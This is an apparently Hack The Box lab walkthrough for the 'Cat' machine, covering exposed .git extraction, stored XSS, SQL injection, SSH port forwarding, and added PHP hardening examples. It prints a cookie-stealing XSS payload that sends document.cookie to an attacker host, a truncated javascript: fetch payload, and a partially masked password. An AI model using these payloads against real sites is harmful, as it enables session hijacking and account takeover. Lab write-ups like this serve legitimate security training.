Cat Hackthebox Writeup
https://app.hackthebox.com/machines/Cat
When accessing port 80, we are redirected to cat.htb. Let’s immediately add an entry to /etc/hosts
echo "10.10.11.53 cat.htb" | sudo tee -a /etc/hosts
Using GitTools, it is possible to extract files from an exposed .git directory. The tool checks whether directory listing is enabled on the web server and recursively downloads the contents of .git for further analysis.
After extraction we have access to the source code of the application. Let’s try to analyze it for vulnerabilities (We can throw it into SAST)
For example, when checking join.php you may notice that user data is written directly to the database during registration and is not filtered or encoded in any way, which leads to Stored XSS.
And in accept_cat.php, you can see SQL injection, which occurs due to direct user input into SQL queries.
Vulnerable part of the code:
// VULNERABLE CODE:
$cat_name = $_POST['catName'];
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);
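The two findings above (unfiltered data stored from join.php and the concatenated INSERT in accept_cat.php) have the same two-part fix: bind values with prepared statements on the way in, and encode on the way out. The block below is an added example, not code from the Cat box; it assumes the `$pdo` handle, the `accepted_cats` table and the `name` column from the snippet above, and uses an in-memory SQLite database (the `pdo_sqlite` extension is assumed) so it runs stand-alone.

```php
<?php
// Added example, not the application's own code: hardened counterparts of the
// two issues found in the source. The INSERT is parameterised so user input is
// bound as data, and anything rendered back is HTML-encoded for the body context.
// $pdo, the accepted_cats table and the name column are assumed from the writeup.

declare(strict_types=1);

function accept_cat(PDO $pdo, string $cat_name): void
{
    // Validate instead of "sanitising": bounded length and an explicit allow-list
    // of letters, digits, space, hyphen and apostrophe (hypothetical policy).
    if ($cat_name === '' || strlen($cat_name) > 64
        || !preg_match('/^[\p{L}\p{N} \-\']+$/u', $cat_name)) {
        throw new InvalidArgumentException('invalid cat name');
    }
    // Prepared statement: the value is bound, never concatenated into the SQL text.
    $stmt = $pdo->prepare('INSERT INTO accepted_cats (name) VALUES (:name)');
    $stmt->execute([':name' => $cat_name]);
}

function render_cat_name(string $cat_name): string
{
    // Output encoding for the HTML body context; stored data can no longer act as markup.
    return htmlspecialchars($cat_name, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed demonstration against an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE accepted_cats (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');

// A legitimate name containing a quote: the old concatenated query would have
// broken on it, the bound parameter stores it literally.
accept_cat($pdo, "O'Malley");
$stored = $pdo->query('SELECT name FROM accepted_cats')->fetchColumn();
echo render_cat_name($stored), PHP_EOL;

// Markup in the name is rejected by validation before it reaches the database.
try {
    accept_cat($pdo, '<script>alert(1)</script>');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The validation rule is deliberately strict and application-specific; the part that actually removes the SQL injection is the prepared statement, and the part that removes the stored XSS is encoding at the point of output, regardless of what validation allowed in.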
But accept_cat.php is available only to the admin user axel. So we need to get into the admin area via the XSS (e.g. by stealing the session cookie), and then use the SQLi to get credentials from the database.
Since nothing is filtered, we can use the basic payload from the PortSwigger Academy
<script>document.location='http://10.10.xx.xx:4444/?c='+document.cookie;</script>
Looking through the Apache log, we can find the credentials for the user axel (linpeas.sh highlights this nicely).
axel:aNdZwgC4****************
It’s probably a hint about privilege escalation, but it’s a lot to read.
So let’s do the usual: find the locally listening ports and forward the web service over SSH
ssh -L 3000:127.0.0.1:3000 [email protected]
Get index.php
<a href='javascript:fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md").then(response=
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    header('Location: dashboard.php');
    exit;
}
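The Basic Auth gate above compares the supplied credentials with loose `!=` against plaintext values and redirects on failure. As an added example (not code from the box), here is the same check written the way a reviewer would ask for it: strict constant-time comparison, a stored password hash instead of a plaintext `$valid_password`, and a 401 challenge rather than a redirect. The configuration values are constructed placeholders.

```php
<?php
// Added example, not the application's own code: a hardened version of the
// HTTP Basic Auth check. $valid_username and the password hash are assumed to
// come from configuration; the values below are constructed placeholders.

declare(strict_types=1);

function basic_auth_ok(array $server, string $valid_username, string $valid_password_hash): bool
{
    // Missing credentials are a hard failure, not a fall-through.
    if (!isset($server['PHP_AUTH_USER'], $server['PHP_AUTH_PW'])) {
        return false;
    }
    // hash_equals() is a strict, constant-time string comparison (no == / != juggling).
    $user_ok = hash_equals($valid_username, (string) $server['PHP_AUTH_USER']);
    // password_verify() checks against a password_hash() digest in constant time,
    // so the plaintext password never has to live in the source or config.
    $pw_ok = password_verify((string) $server['PHP_AUTH_PW'], $valid_password_hash);
    // Both are evaluated before combining so the response time does not tell
    // the caller which half failed.
    return $user_ok && $pw_ok;
}

function require_basic_auth(array $server, string $valid_username, string $valid_password_hash): void
{
    if (!basic_auth_ok($server, $valid_username, $valid_password_hash)) {
        // Explicit 401 with a challenge instead of a 302 to dashboard.php:
        // the failure is unambiguous to the client and shows up as such in the access log.
        header('WWW-Authenticate: Basic realm="restricted"');
        http_response_code(401);
        exit;
    }
}

// Constructed demonstration values (placeholders, not the box's credentials).
$valid_username = 'admin';
$valid_password_hash = password_hash('correct-horse-battery-staple', PASSWORD_DEFAULT);

// Correct credentials, wrong password, and no credentials at all.
var_dump(basic_auth_ok(
    ['PHP_AUTH_USER' => 'admin', 'PHP_AUTH_PW' => 'correct-horse-battery-staple'],
    $valid_username, $valid_password_hash));
var_dump(basic_auth_ok(
    ['PHP_AUTH_USER' => 'admin', 'PHP_AUTH_PW' => 'wrong'],
    $valid_username, $valid_password_hash));
var_dump(basic_auth_ok([], $valid_username, $valid_password_hash));
```

In a real handler the call is simply `require_basic_auth($_SERVER, $valid_username, $valid_password_hash);` at the top of the protected script; the separation into a pure boolean function is what makes the check unit-testable without a web server.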